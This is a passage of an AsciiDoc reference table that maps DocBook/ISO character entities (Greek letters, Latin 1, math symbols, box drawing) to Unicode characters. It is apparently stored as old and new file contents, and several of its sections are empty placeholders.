|\n|====\n\n\n=== Greek Letters Character Entities (%isogrk1;)\nGreek Letters Character Entities\n\n[width=\"100%\",cols=\"1^,1^,4\",frame=\"topbot\", options=\"header\"]\n|====\n| Entity | Unicode | ISO Description\n| | |\n|====\n\n\n=== Monotoniko Greek Character Entities (%isogrk2;)\nMonotoniko Greek Character Entities\n\n[width=\"100%\",cols=\"1^,1^,4\",frame=\"topbot\", options=\"header\"]\n|====\n| Entity | Unicode | ISO Description\n| &agr; | α | Greek small letter alpha\n| &Agr; | Α | Greek capital letter ALPHA\n| &bgr; | β | Greek small letter beta\n| &Bgr; | Β | Greek capital letter BETA\n| &ggr; | γ | Greek small letter gamma\n| &Ggr; | Γ | Greek capital letter GAMMA\n| &dgr; | δ | Greek small letter delta\n| &Dgr; | Δ | Greek capital letter DELTA\n| & egr; | & #x03B5; | Greek small letter epsilon\n| & Egr; | & #x395; | Greek capital letter EPSILON\n| &zgr; | ζ | Greek small letter zeta\n| &Zgr; | Ζ | Greek capital letter ZETA\n| &eegr; | η | Greek small letter eta\n| &EEgr; | Η | Greek capital letter ETA\n| & thgr; | & #x03B8; | Greek small letter theta\n| &THgr; | Θ | Greek capital letter THETA\n| &igr; | ι | Greek small letter iota\n| &Igr; | Ι | Greek capital letter IOTA\n| &kgr; | κ | Greek small letter kappa\n| &Kgr; | Κ | Greek capital letter KAPPA\n| &lgr; | λ | Greek small letter lamda\n| &Lgr; | Λ | Greek capital letter LAMDA\n| &mgr; | μ | Greek small letter mu\n| &Mgr; | Μ | Greek capital letter MU\n| &ngr; | ν | Greek small letter nu\n| &Ngr; | Ν | Greek capital letter NU\n| &xgr; | ξ | Greek small letter xi\n| &Xgr; | Ξ | Greek capital letter XI\n| &ogr; | ο | Greek small letter omicron\n| &Ogr; | Ο | Greek capital letter OMICRON\n| &pgr; | π | Greek small letter pi\n| &Pgr; | Π | Greek capital letter PI\n| &rgr; | ρ | Greek small letter rho\n| &Rgr; | Ρ | Greek capital letter RHO\n| &sgr; | σ | Greek small letter sigma\n| &Sgr; | Σ | Greek capital letter SIGMA\n| &sfgr; | ς | Greek small letter final sigma\n| &tgr; | τ | Greek small letter tau\n| & Tgr; | & #x03A4; | Greek capital letter TAU\n| &ugr; | υ | Greek small letter upsilon\n| &Ugr; | Υ | Greek capital letter UPSILON\n| &phgr; | φ | Greek small letter phi\n| &PHgr; | Φ | Greek capital letter PHI\n| &khgr; | χ | Greek small letter chi\n| &KHgr; | Χ | Greek capital letter CHI\n| &psgr; | ψ | Greek small letter psi\n| &PSgr; | Ψ | Greek capital letter PSI\n| &ohgr; | ω | Greek small letter omega\n| &OHgr; | Ω | Greek capital letter OMEGA\n|====\n\n\n=== Greek Symbols Character Entities (%isogrk3;)\nGreek Symbols Character Entities\n\n[width=\"100%\",cols=\"1^,1^,4\",frame=\"topbot\", options=\"header\"]\n|====\n| Entity | Unicode | ISO Description\n| α | α | Greek small letter alpha\n| β | β | Greek small letter beta\n| γ | γ | Greek small letter gamma\n| Γ | Γ | Greek capital letter GAMMA\n| ϝ | Ϝ | Greek letter digamma\n| δ | δ | Greek small letter delta\n| Δ | Δ | Greek capital letter DELTA\n| ε | ε | Greek small letter epsilon\n| & epsiv; | & #x025B; | Latin small letter open e\n| & epsis; | & #x03B5; | Greek small letter epsilon\n| ζ | ζ | Greek small letter zeta\n| η | η | Greek small letter eta\n| & thetas; | & #x03B8; | Greek small letter theta\n| Θ | Θ | Greek capital letter THETA\n| & thetav; | & #x03D1; | Greek theta symbol\n| ι | ι | Greek small letter iota\n| κ | κ | Greek small letter kappa\n| ϰ | ϰ | Greek kappa symbol\n| λ | λ | Greek small letter lamda\n| Λ | Λ | Greek capital letter LAMDA\n| μ | μ | Greek small letter mu\n| ν | ν | Greek small letter nu\n| ξ | ξ | Greek small letter xi\n| Ξ | Ξ | Greek capital letter XI\n| π | π | Greek small letter pi\n| ϖ | ϖ | Greek omega symbol\n| Π | Π | Greek capital letter PI\n| ρ | ρ | Greek small letter rho\n| ϱ | ϱ | Greek rho symbol\n| σ | σ | Greek small letter sigma\n| Σ | Σ | Greek capital letter SIGMA\n| ς | ς | Greek small letter final sigma\n| τ | τ | Greek small letter tau\n| υ | υ | Greek small letter upsilon\n| ϒ | ϒ | Greek upsilon with hook symbol\n| &phis; | φ | Greek small letter phi\n| Φ | Φ | Greek capital letter PHI\n| ϕ | ϕ | Greek phi symbol\n| χ | χ | Greek small letter chi\n| ψ | ψ | Greek small letter psi\n| Ψ | Ψ | Greek capital letter PSI\n| ω | ω | Greek small letter omega\n| Ω | Ω | Greek capital letter OMEGA\n|====\n\n\n=== Alternative Greek Symbols Character Entities (%isogrk4;)\nAlternative Greek Symbols Character Entities\n\n[width=\"100%\",cols=\"1^,1^,4\",frame=\"topbot\", options=\"header\"]\n|====\n| Entity | Unicode | ISO Description\n| &b.alpha; | α | Greek small letter alpha\n| &b.beta; | β | Greek small letter beta\n| &b.gamma; | γ | Greek small letter gamma\n| &b.Gamma; | Γ | Greek capital letter GAMMA\n| &b.gammad; | Ϝ | Greek letter digamma\n| &b.delta; | δ | Greek small letter delta\n| &b.Delta; | Δ | Greek capital letter DELTA\n| &b.epsi; | ε | Greek small letter epsilon\n| & b.epsiv; | & #x025B; | Latin small letter open e\n| &b.epsis; | ε | Greek small letter epsilon\n| &b.zeta; | ζ | Greek small letter zeta\n| &b.eta; | η | Greek small letter eta\n| & b.thetas; | & #x03B8; | Greek small letter theta\n| & b.Theta; | & #x398; | Greek capital letter THETA\n| & b.thetav; | & #x03D1; | Greek theta symbol\n| &b.iota; | ι | Greek small letter iota\n| &b.kappa; | κ | Greek small letter kappa\n| &b.kappav; | ϰ | Greek kappa symbol\n| &b.lambda; | λ | Greek small letter lamda\n| &b.Lambda; | Λ | Greek capital letter LAMDA\n| &b.mu; | μ | Greek small letter mu\n| &b.nu; | ν | Greek small letter nu\n| &b.xi; | ξ | Greek small letter xi\n| &b.Xi; | Ξ | Greek capital letter XI\n| &b.pi; | π | Greek small letter pi\n| &b.Pi; | Π | Greek capital letter PI\n| &b.piv; | ϖ | Greek omega symbol\n| &b.rho; | ρ | Greek small letter rho\n| &b.rhov; | ϱ | Greek rho symbol\n| &b.sigma; | σ | Greek small letter sigma\n| &b.Sigma; | Σ | Greek capital letter SIGMA\n| &b.sigmav; | ς | Greek small letter final sigma\n| &b.tau; | τ | Greek small letter tau\n| &b.upsi; | υ | Greek small letter upsilon\n| &b.Upsi; | ϒ | Greek upsilon with hook symbol\n| &b.phis; | φ | Greek small letter phi\n| &b.Phi; | Φ | Greek capital letter PHI\n| &b.phiv; | ϕ | Greek phi symbol\n| &b.chi; | χ | Greek small letter chi\n| &b.psi; | ψ | Greek small letter psi\n| &b.Psi; | Ψ | Greek capital letter PSI\n| &b.omega; | ω | Greek small letter omega\n| &b.Omega; | Ω | Greek capital letter OMEGA\n|====\n\n\n=== ISO Latin 1 Character Entities (%isolat1;)\nISO Latin 1 Character Entities\n\n[width=\"100%\",cols=\"1^,1^,4\",frame=\"topbot\", options=\"header\"]\n|====\n| Entity | Unicode | ISO Description\n| á | | Latin small letter a with acute\n| Á | Á | Latin capital letter A with acute\n| â | | Latin small letter a with circumflex\n| Â | Â | Latin capital letter A with circumflex\n| à | | Latin small letter a with grave\n| À | À | Latin capital letter A with grave\n| å | | Latin small letter a with ring above\n| Å | Å | Latin capital letter A with ring above\n| ã | | Latin small letter a with tilde\n| Ã | Ã | Latin capital letter A with tilde\n| ä | | Latin small letter a with diaeresis\n| Ä | Ä | Latin capital letter A with diaeresis\n| æ | | Latin small letter ae\n| Æ | Æ | Latin capital letter AE\n| ç | | Latin small letter c with cedilla\n| Ç | Ç | Latin capital letter C with cedilla\n| ð | ð | Latin small letter eth\n| Ð | Ð | Latin capital letter ETH\n| é | | Latin small letter e with acute\n| É | É | Latin capital letter E with acute\n| ê | ê | Latin small letter e with circumflex\n| Ê | Ê | Latin capital letter E with circumflex\n| è | | Latin small letter e with grave\n| È | È | Latin capital letter E with grave\n| ë | ë | Latin small letter e with diaeresis\n| Ë | Ë | Latin capital letter E with diaeresis\n| í | í | Latin small letter i with acute\n| Í | Í | Latin capital letter I with acute\n| î | î | Latin small letter i with circumflex\n| Î | Î | Latin capital letter I with circumflex\n| ì | ì | Latin small letter i with grave\n| Ì | Ì | Latin capital letter I with grave\n| ï | ï | Latin small letter i with diaeresis\n| Ï | Ï | Latin capital letter I with diaeresis\n| ñ | ñ | Latin small letter n with tilde\n| Ñ | Ñ | Latin capital letter N with tilde\n| ó | ó | Latin small letter o with acute\n| Ó | Ó | Latin capital letter O with acute\n| ô | ô | Latin small letter o with circumflex\n| Ô | Ô | Latin capital letter O with circumflex\n| ò | ò | Latin small letter o with grave\n| Ò | Ò | Latin capital letter O with grave\n| ø | ø | Latin small letter o with stroke\n| Ø | Ø | Latin capital letter O with stroke\n| õ | õ | Latin small letter o with tilde\n| Õ | Õ | Latin capital letter O with tilde\n| ö | ö | Latin small letter o with diaeresis\n| Ö | Ö | Latin capital letter O with diaeresis\n| ß | ß | Latin small letter sharp s\n| þ | þ | Latin small letter thorn\n| Þ | Þ | Latin capital letter THORN\n| ú | ú | Latin small letter u with acute\n| Ú | Ú | Latin capital letter U with acute\n| û | û | Latin small letter u with circumflex\n| Û | Û | Latin capital letter U with circumflex\n| ù | ù | Latin small letter u with grave\n| Ù | Ù | Latin capital letter U with grave\n| ü | ü | Latin small letter u with diaeresis\n| Ü | Ü | Latin capital letter U with diaeresis\n| ý | ý | Latin small letter y with acute\n| Ý | Ý | Latin capital letter Y with acute\n| ÿ | ÿ | Latin small letter y with diaeresis\n\n|====\n\n\n=== Added Latin 2 Character Entities (%isolat2;)\nAdded Latin 2 Character Entities\n\n[width=\"100%\",cols=\"1^,1^,4\",frame=\"topbot\", options=\"header\"]\n|====\n| Entity | Unicode | ISO Description\n| | |\n|====\n\n\n=== Numeric and Special Graphic Character Entities (%isonum;)\nNumeric and Special Graphic Character Entities\n\n[width=\"100%\",cols=\"1^,1^,4\",frame=\"topbot\", options=\"header\"]\n|====\n| Entity | Unicode | ISO Description\n| | |\n|====\n\n\n=== Publishing Character Entities (%isopub;)\nPublishing Character Entities\n\n[width=\"100%\",cols=\"1^,1^,4\",frame=\"topbot\", options=\"header\"]\n|====\n| Entity | Unicode | ISO Description\n| | |\n|====\n\n\n=== General Technical Character Entities (%isotech;)\nGeneral Technical Character Entities\n\n[width=\"100%\",cols=\"1^,1^,4\",frame=\"topbot\", options=\"header\"]\n|====\n| Entity | Unicode | ISO Description\n| | |\n|====\n\n\n","old_contents":"== DocBook Character Entity Reference\n\nThese symbols where extrated from http:\/\/www.oasis-open.org\/docbook\/documentation\/reference\/html\/refchar.html.\n\nThis document was made to show how to write symbols with asciidoc.\nIt was also made to compile with dblatex. For example, since the \n`ℜ` doesn't compile with dblatex it will be here \nlike this: `& real;`. But if you are going to use in html or fop, you\ncan use `ℜ`.\n\nYou can see the code for \nhttps:\/\/raw.githubusercontent.com\/edusantana\/novo-livro\/master\/livro\/capitulos\/symbols.adoc[this document here].\n\n=== Added Math Symbols: Arrow Relations Character Entities (%isoamsa;)\n\nhttp:\/\/www.oasis-open.org\/docbook\/documentation\/reference\/html\/iso-amsb.html[Added Math Symbols: Arrow Relations Character Entities]\n\n\n[width=\"100%\",cols=\"1^,1^,4\",frame=\"topbot\", options=\"header\"]\n|====\n| Entity | Unicode | ISO Description\n| & amalg; | | amalgamation or coproduct\n| & Barwed; | ⊼ | Nand\n| ⌅ | ⊼ | Nand\n| ⋒ | ⋒ | Double intersection\n| ⋓ | ⋓ | Double union\n| ⋎ | ⋎ | Curly logical or\n| ⋏ | ⋏ | Curly logical and\n| ⋄ | ⋄ | Diamond operator\n| ⋇ | ⋇ | Division times\n| ⊺ | ⊺ | Intercalate\n| ⋋ | ⋋ | Left semidirect product\n| ⋉ | ⋉ | Left normal factor semidirect product\n| ⊟ | ⊟ | Squared minus\n| ⊛ | ⊛ | Circled asterisk operator\n| ⊚ | ⊚ | Circled ring operator\n| ⊝ | ⊝ | Circled dash\n| ⊙ | ⊙ | Circled dot operator\n| ⊖ | ⊖ | Circled minus\n| ⊕ | ⊕ | Circled plus\n| ⊘ | ⊘ | Circled division slash\n\n| ⊗ | ⊗ | Circled times\n| ⊞ | ⊞ | Squared plus\n| ∔ | ∔ | Dot plus\n| ⋌ | ⋌ | Right semidirect product\n| ⋊ | ⋊ | Right normal factor semidirect product\n| ⋅ | ⋅ | Dot operator\n| ⊡ | ⊡ | Squared dot operator\n| ∖ | ∖ | Set minus\n| ⊓ | ⊓ | Square cap\n| ⊔ | ⊔ | Square cup\n\n| & ssetmn; | | sm reverse solidus\n| ⋆ | ⋆ | Star operator\n| ⊠ | ⊠ | Squared times\n| ⊤ | ⊤ | Down tack\n| ⊎ | ⊎ | Multiset union\n| ≀ | ≀ | Wreath product\n| ◯ | ◯ | Large circle\n| ▽ | ▽ | White down-pointing triangle\n| △ | △ | White up-pointing triangle\n| ∐ | ∐ | N-ary coproduct\n\n| ∏ | ∏ | N-ary product\n| ∑ | ∑ | N-ary summation\n\n|====\n\n\n=== Added Math Symbols: Binary Operators Character Entities (%isoamsb;)\n\nhttp:\/\/www.oasis-open.org\/docbook\/documentation\/reference\/html\/iso-amsa.html[Added Math Symbols: Binary Operators Character Entities]\n\n[width=\"100%\",cols=\"1^,1^,4\",frame=\"topbot\", options=\"header\"]\n|====\n| Entity | Unicode | ISO Description\n\n| ↶ | ↶ | Anticlockwise top semicircle arrow\n| ↷ | ↷ | Clockwise top semicircle arrow\n| ⇓ | ⇓ | Downwards double arrow\n| &darr2; | ⇊ | Downwards paired arrows\n| ⇃ | ⇃ | Downwards harpoon with barb leftwards\n| ⇂ | ⇂ | Downwards harpoon with barb rightwards\n| ⇚ | ⇚ | Leftwards triple arrow\n| ↞ | ↞ | Leftwards two headed arrow\n| &larr2; | ⇇ | Leftwards paired arrows\n| ↩ | ↩ | Leftwards arrow with hook\n| ↫ | ↫ | Leftwards arrow with loop\n| ↢ | ↢ | Leftwards arrow with tail\n| ↽ | ↽ | Leftwards harpoon with barb downwards\n| ↼ | ↼ | Leftwards harpoon with barb upwards\n| ⇔ | ⇔ | Left right double arrow\n| ↔ | ↔ | Left right arrow\n| &lrarr2; | ⇆ | Leftwards arrow over rightwards arrow\n| &rlarr2; | ⇄ | Rightwards arrow over leftwards arrow\n| ↭ | ↭ | Left right wave arrow\n| &rlhar2; | ⇌ | Rightwards harpoon over leftwards harpoon\n| &lrhar2; | ⇋ | Leftwards harpoon over rightwards harpoon\n| ↰ | ↰ | Upwards arrow with tip leftwards\n| ↦ | ↦ | Rightwards arrow from bar\n| ⊸ | ⊸ | Multimap\n| ↗ | ↗ | North east arrow\n| ⇍ | ⇍ | Leftwards double arrow with stroke\n| ↚ | ↚ | Leftwards arrow with stroke\n| ⇎ | ⇎ | Left right double arrow with stroke\n| ↮ | ↮ | Left right arrow with stroke\n| ↛ | ↛ | Rightwards arrow with stroke\n| ⇏ | ⇏ | Rightwards double arrow with stroke\n| ↖ | ↖ | North west arrow\n| ↺ | ↺ | Anticlockwise open circle arrow\n| ↻ | ↻ | Clockwise open circle arrow\n| ⇛ | ⇛ | Rightwards triple arrow\n| ↠ | ↠ | Rightwards two headed arrow\n| &rarr2; | ⇉ | Rightwards paired arrows\n| ↪ | ↪ | Rightwards arrow with hook\n| ↬ | ↬ | Rightwards arrow with loop\n| ↣ | ↣ | Rightwards arrow with tail\n| & rarrw; | ⇝ | Rightwards squiggle arrow\n| ⇁ | ⇁ | Rightwards harpoon with barb downwards\n| ⇀ | ⇀ | Rightwards harpoon with barb upwards\n| ↱ | ↱ | Upwards arrow with tip rightwards\n| &drarr; | ↘ | South east arrow\n| &dlarr; | ↙ | South west arrow\n| ⇑ | ⇑ | Upwards double arrow\n| &uarr2; | ⇈ | Upwards paired arrows\n| ⇕ | ⇕ | Up down double arrow\n| ↕ | ↕ | Up down arrow\n| ↿ | ↿ | Upwards harpoon with barb leftwards\n| ↾ | ↾ | Upwards harpoon with barb rightwards\n| & xlArr; | | long l dbl arrow \n| & xhArr; | | long l&r dbl arr\n| & xharr; | | long l&r arr \n| & xrArr; | | long rt dbl arr \n\n\n|====\n\n=== Added Math Symbols: Delimiters Character Entities (%isoamsc;)\n\nhttp:\/\/www.oasis-open.org\/docbook\/documentation\/reference\/html\/iso-amsc.html[Added Math Symbols: Delimiters Character Entities]\n\n[width=\"100%\",cols=\"1^,1^,4\",frame=\"topbot\", options=\"header\"]\n|====\n| Entity | Unicode | ISO Description\n| ⌉ | ⌉ | Right ceiling\n| ⌋ | ⌋ | Right floor\n| & rpargt; | | right paren, gt\n| ⌝ | ⌝ | Top right corner\n| ⌟ | ⌟ | Bottom right corner\n| ⌈ | ⌈ | Left ceiling\n| ⌊ | ⌊ | Left floor\n| & lpargt; | | left parenthesis, gt\n| ⌜ | ⌜ | Top left corner\n| ⌞ | ⌞ | Bottom left corner\n|====\n\n=== Added Math Symbols: Negated Relations Character Entities (%isoamsn;)\n\nhttp:\/\/www.oasis-open.org\/docbook\/documentation\/reference\/html\/iso-amsn.html[Added Math Symbols: Negated Relations Character Entities]\n\n[width=\"100%\",cols=\"1^,1^,4\",frame=\"topbot\", options=\"header\"]\n|====\n| Entity | Unicode | ISO Description\n| ⪊ | | greater, not approximate\n| ⪈ | ≩ | Greater-than but not equal to\n| ≩ | ≩ | Greater-than but not equal to\n| ⋧ | ⋧ | Greater-than but not equivalent to\n| ≩︀ | | gt, vert, not dbl eq\n| ⪉ | | less, not approximate\n| ≨ | ≨ | Less-than but not equal to\n| ⪇ | ≨ | Less-than but not equal to\n| ⋦ | ⋦ | Less-than but not equivalent to\n| ≨︀ | | less, vert, not dbl eq\n| ≉ | ≉ | Not almost equal to\n| ≇ | ≇ | Neither approximately nor actually equal to\n| ≢ | ≢ | Not identical to\n| ≧̸ | ≱ | Neither greater-than nor equal to\n| ≱ | | not greater-than-or-equal\n| ⩾̸ | ≱ | Neither greater-than nor equal to\n| ≯ | ≯ | Not greater-than\n| ≰ | | not less-than-or-equal\n| ≦̸ | ≰ | Neither less-than nor equal to\n| ⩽̸ | ≰ | Neither less-than nor equal to\n| ≮ | ≮ | Not less-than\n| ⋪ | ⋪ | Not normal subgroup of\n| ⋬ | ⋬ | Not normal subgroup of or equal to\n| ∤ | ∤ | Does not divide\n| ∦ | ∦ | Not parallel to\n| ⊀ | ⊀ | Does not precede\n| ⪯̸ | | not precedes, equals\n| ⋫ | ⋫ | Does not contain as normal subgroup of\n| ⋭ | ⋭ | Does not contain as normal subgroup or equal\n| ⊁ | ⊁ | Does not succeed\n| ⪰̸ | | not succeeds, equals\n| ≁ | ≁ | Not tilde\n| ≄ | ≄ | Not asymptotically equal to\n| ∤ | | nshortmid\n| ∦ | | not short par\n| ⊄ | ⊄ | Not a subset of\n| ⊈ | ⊈ | Neither a subset of nor equal to\n| ⫅̸ | ⊈ | Neither a subset of nor equal to\n| ⊅ | ⊅ | Not a superset of\n| ⫆̸ | ⊉ | Neither a superset of nor equal to\n| ⊉ | ⊉ | Neither a superset of nor equal to\n| ⊬ | ⊬ | Does not prove\n| ⊭ | ⊭ | Not true\n| ⊯ | ⊯ | Negated double vertical bar double right turnstile\n| ⊮ | ⊮ | Does not force\n| & prnap; | & #x22E8; | Precedes but not equivalent to\n| ⪵ | | precedes, not dbl eq\n| & prnsim; | & #x22E8; | Precedes but not equivalent to\n| ⪺ | ⋩ | Succeed but not equivalent to\n| ⪶ | | succeeds, not dbl eq\n| ⋩ | ⋩ | Succeed but not equivalent to\n| ⊊ | ⊊ | Subset of or not equal to\n| ⫋ | ⊊ | Subset of or not equal to\n| ⊋ | ⊋ | Superset of or not equal to\n| ⫌ | ⊋ | Superset of or not equal to\n| ⫋︀ | | subset not dbl eq, var\n| ⊊︀ | | subset, not eq, var\n| ⊋︀ | | superset, not eq, var\n| ⫌︀ | | super not dbl eq, var\n\n|====\n\n=== Added Math Symbols: Ordinary Character Entities (%isoamso;)\n\nhttp:\/\/www.oasis-open.org\/docbook\/documentation\/reference\/html\/iso-amso.html[Added Math Symbols: Ordinary Character Entities]\n\n[width=\"100%\",cols=\"1^,1^,4\",frame=\"topbot\", options=\"header\"]\n|====\n| Entity | Unicode | ISO Description\n| ∠ | ∠ | Angle\n| ∡ | ∡ | Measured angle\n| ℶ | ℶ | Bet symbol\n| ‵ | ‵ | Reversed prime\n| ∁ | ∁ | Complement\n| ℸ | ℸ | Dalet symbol\n| ℓ | ℓ | Script small l\n| ∅ | | emptyset \/varnothing =small o, slash\n| ℷ | ℷ | Gimel symbol\n| ℑ | ℑ | Fraktur letter capital i\n| ı | ı | Latin small letter dotless i\n| & jnodot; | | jmath - small j, no dot\n| ∄ | ∄ | There does not exist\n| Ⓢ | Ⓢ | Circled latin capital letter S\n| ℏ | ħ | Latin small letter h with stroke\n| ℜ | ℜ | Fraktur letter capital r\n| &sbsol; | | sbs - short reverse solidus\n| &vprime; | ′ | Prime\n| ℘ | ℘ | Script capital p\n\n|====\n\n=== Added Math Symbols: Relations Character Entities (%isoamsr;)\nAdded Math Symbols: Relations Character Entities\n\n[width=\"100%\",cols=\"1^,1^,4\",frame=\"topbot\", options=\"header\"]\n|====\n| Entity | Unicode | ISO Description\n| ≊ | ≊ | Almost equal or equal to\n| ≈ | ≍ | Equivalent to\n| & bcong; | & #x224C; | All equal to\n| ϶ | | such that\n| ⋈ | ⋈ | Bowtie\n| ∽ | ∽ | Reversed tilde\n| ⋍ | ⋍ | Reversed tilde equals\n| ≎ | ≎ | Geometrically equivalent to\n| ≏ | ≏ | Difference between\n| ≗ | ≗ | Ring equal to\n| ≔ | ≔ | Colon equals\n| ⋞ | ⋞ | Equal to or precedes\n| ⋟ | ⋟ | Equal to or succeeds\n| &cupre; | ≼ | Precedes or equal to\n| ⊣ | ⊣ | Left tack\n| ≖ | ≖ | Ring in equal to\n| ≕ | ≕ | Equals colon\n| ≑ | ≑ | Geometrically equal to\n| ≐ | ≐ | Approaches the limit\n| ≒ | ≒ | Approximately equal to or the image of\n| ⪖ | ⋝ | Equal to or greater-than\n| ⪕ | ⋜ | Equal to or less-than\n| ≓ | ≓ | Image of or approximately equal to\n| ⋔ | ⋔ | Pitchfork\n| ⌢ | ⌢ | Frown\n| & gap; | & #x2273; | Greater-than or equivalent to\n| &gsdot; | ⋗ | Greater-than with dot\n| ≧ | ≧ | Greater-than over equal to\n| ⋛ | ⋛ | Greater-than equal to or less-than\n| ⪌ | ⋛ | Greater-than equal to or less-than\n| ⩾ | | gt-or-equal, slanted\n| & Gg; | & #x22D9; | Very much greater-than\n| ≷ | ≷ | Greater-than or less-than\n| & gsim; | & #x2273; | Greater-than or equivalent to\n| ≫ | ≫ | Much greater-than\n| & lap; | & #x2272; | Less-than or equivalent to\n| &ldot; | ⋖ | Less-than with dot\n| ≦ | ≦ | Less-than over equal to\n| ⪋ | ⋚ | Less-than equal to or greater-than\n| ⋚ | ⋚ | Less-than equal to or greater-than\n| ⩽ | | less-than-or-eq, slant\n| ≶ | ≶ | Less-than or greater-than\n| & Ll; | & #x22D8; | Very much less-than\n| & lsim; | & #x2272; | Less-than or equivalent to\n| & Lt; | & #x226A; | Much less-than\n| ⊴ | ⊴ | Normal subgroup of or equal to\n| ∣ | ∣ | Divides\n| & models; | & #x22A7; | Models\n| ≺ | ≺ | Precedes\n| ⪷ | ≾ | Precedes or equivalent to\n| ⪯ | | precedes, equals\n| ≾ | ≾ | Precedes or equivalent to\n| ⊵ | ⊵ | Contains as normal subgroup or equal to\n| &samalg; | ∐ | N-ary coproduct\n| ≻ | ≻ | Succeeds\n| ⪸ | ≿ | Succeeds or equivalent to\n| ≽ | ≽ | Succeeds or equal to\n| ⪰ | ≽ | Succeeds or equal to\n| ≿ | ≿ | Succeeds or equivalent to\n| ⌢ | | small down curve\n| ∣ | | \u00a0\n| ⌣ | ⌣ | Smile\n| ∥ | | short parallel\n| ⊏ | ⊏ | Square image of\n| ⊑ | ⊑ | Square image of or equal to\n| ⊐ | ⊐ | Square original of\n| ⊒ | ⊒ | Square original of or equal to\n| ⌣ | | small up curve\n| ⋐ | ⋐ | Double subset\n| ⫅ | ⊆ | Subset of or equal to\n| ⋑ | ⋑ | Double superset\n| ⫆ | ⊇ | Superset of or equal to\n| ≈ | | thick approximate\n| ∼ | | thick similar\n| ≜ | ≜ | Delta equal to\n| ≬ | ≬ | Between\n| ⊢ | ⊢ | Right tack\n| ⊩ | ⊩ | Forces\n| & vDash; | & #x22A8; | True\n| ⊻ | ⊻ | Xor\n| ⊲ | ⊲ | Normal subgroup of\n| ∝ | ∝ | Proportional to\n| ⊳ | ⊳ | Contains as normal subgroup\n| ⊪ | ⊪ | Triple vertical bar right turnstile\n\n|====\n\n\n=== Box and Line Drawing Character Entities (%isobox;)\nBox and Line Drawing Character Entities\n\n[width=\"100%\",cols=\"1^,1^,4\",frame=\"topbot\", options=\"header\"]\n|====\n| Entity | Unicode | ISO Description\n| ─ | ─ | Box drawings light horizontal\n| │ | │ | Box drawings light vertical\n| └ | └ | Box drawings light up and right\n| ┘ | ┘ | Box drawings light up and left\n| ┐ | ┐ | Box drawings light down and left\n| ┌ | ┌ | Box drawings light down and right\n| ├ | ├ | Box drawings light vertical and right\n| ┴ | ┴ | Box drawings light up and horizontal\n| ┤ | ┤ | Box drawings light vertical and left\n| ┬ | ┬ | Box drawings light down and horizontal\n| ┼ | ┼ | Box drawings light vertical and horizontal\n| ╞ | ╞ | Box drawings vertical single and right double\n| ╨ | ╨ | Box drawings up double and horizontal single\n| ╡ | ╡ | Box drawings vertical single and left double\n| ╥ | ╥ | Box drawings down double and horizontal single\n| ╪ | ╪ | Box drawings vertical single and horizontal double\n| ═ | ═ | Box drawings double horizontal\n| ║ | ║ | Box drawings double vertical\n| ╚ | ╚ | Box drawings double up and right\n| ╝ | ╝ | Box drawings double up and left\n| ╗ | ╗ | Box drawings double down and left\n| ╔ | ╔ | Box drawings double down and right\n| ╠ | ╠ | Box drawings double vertical and right\n| ╩ | ╩ | Box drawings double up and horizontal\n| ╣ | ╣ | Box drawings double vertical and left\n| ╦ | ╦ | Box drawings double down and horizontal\n| ╬ | ╬ | Box drawings double vertical and horizontal\n| ╟ | ╟ | Box drawings vertical double and right single\n| ╧ | ╧ | Box drawings up single and horizontal double\n| ╢ | ╢ | Box drawings vertical double and left single\n| ╤ | ╤ | Box drawings down single and horizontal double\n| ╫ | ╫ | Box drawings vertical double and horizontal single\n| ╘ | ╘ | Box drawings up single and right double\n| ╜ | ╜ | Box drawings up double and left single\n| ╕ | ╕ | Box drawings down single and left double\n| ╓ | ╓ | Box drawings down double and right single\n| ╙ | ╙ | Box drawings up double and right single\n| ╛ | ╛ | Box drawings up single and left double\n| ╖ | ╖ | Box drawings down double and left single\n| ╒ | ╒ | Box drawings down single and right double\n\n|====\n\n\n=== Russian Cyrillic Character Entities (%isocyr1;)\nRussian Cyrillic Character Entities\n\n[width=\"100%\",cols=\"1^,1^,4\",frame=\"topbot\", options=\"header\"]\n|====\n| Entity | Unicode | ISO Description\n| | |\n|====\n\n\n=== Non-Russian Cyrillic Character Entities (%isocyr2;)\nNon-Russian Cyrillic Character Entities\n\n[width=\"100%\",cols=\"1^,1^,4\",frame=\"topbot\", options=\"header\"]\n|====\n| Entity | Unicode | ISO Description\n| | |\n|====\n\n\n=== Diacritical Marks Character Entities (%isodia;)\nDiacritical Marks Character Entities\n\n[width=\"100%\",cols=\"1^,1^,4\",frame=\"topbot\", options=\"header\"]\n|====\n| Entity | Unicode | ISO Description\n| | |\n|====\n\n\n=== Greek Letters Character Entities (%isogrk1;)\nGreek Letters Character Entities\n\n[width=\"100%\",cols=\"1^,1^,4\",frame=\"topbot\", options=\"header\"]\n|====\n| Entity | Unicode | ISO Description\n| | |\n|====\n\n\n=== Monotoniko Greek Character Entities (%isogrk2;)\nMonotoniko Greek Character Entities\n\n[width=\"100%\",cols=\"1^,1^,4\",frame=\"topbot\", options=\"header\"]\n|====\n| Entity | Unicode | ISO Description\n| &agr; | α | Greek small letter alpha\n| &Agr; | Α | Greek capital letter ALPHA\n| &bgr; | β | Greek small letter beta\n| &Bgr; | Β | Greek capital letter BETA\n| &ggr; | γ | Greek small letter gamma\n| &Ggr; | Γ | Greek capital letter GAMMA\n| &dgr; | δ | Greek small letter delta\n| &Dgr; | Δ | Greek capital letter DELTA\n| & egr; | & #x03B5; | Greek small letter epsilon\n| & Egr; | & #x395; | Greek capital letter EPSILON\n| &zgr; | ζ | Greek small letter zeta\n| &Zgr; | Ζ | Greek capital letter ZETA\n| &eegr; | η | Greek small letter eta\n| &EEgr; | Η | Greek capital letter ETA\n| & thgr; | & #x03B8; | Greek small letter theta\n| &THgr; | Θ | Greek capital letter THETA\n| &igr; | ι | Greek small letter iota\n| &Igr; | Ι | Greek capital letter IOTA\n| &kgr; | κ | Greek small letter kappa\n| &Kgr; | Κ | Greek capital letter KAPPA\n| &lgr; | λ | Greek small letter lamda\n| &Lgr; | Λ | Greek capital letter LAMDA\n| &mgr; | μ | Greek small letter mu\n| &Mgr; | Μ | Greek capital letter MU\n| &ngr; | ν | Greek small letter nu\n| &Ngr; | Ν | Greek capital letter NU\n| &xgr; | ξ | Greek small letter xi\n| &Xgr; | Ξ | Greek capital letter XI\n| &ogr; | ο | Greek small letter omicron\n| &Ogr; | Ο | Greek capital letter OMICRON\n| &pgr; | π | Greek small letter pi\n| &Pgr; | Π | Greek capital letter PI\n| &rgr; | ρ | Greek small letter rho\n| &Rgr; | Ρ | Greek capital letter RHO\n| &sgr; | σ | Greek small letter sigma\n| &Sgr; | Σ | Greek capital letter SIGMA\n| 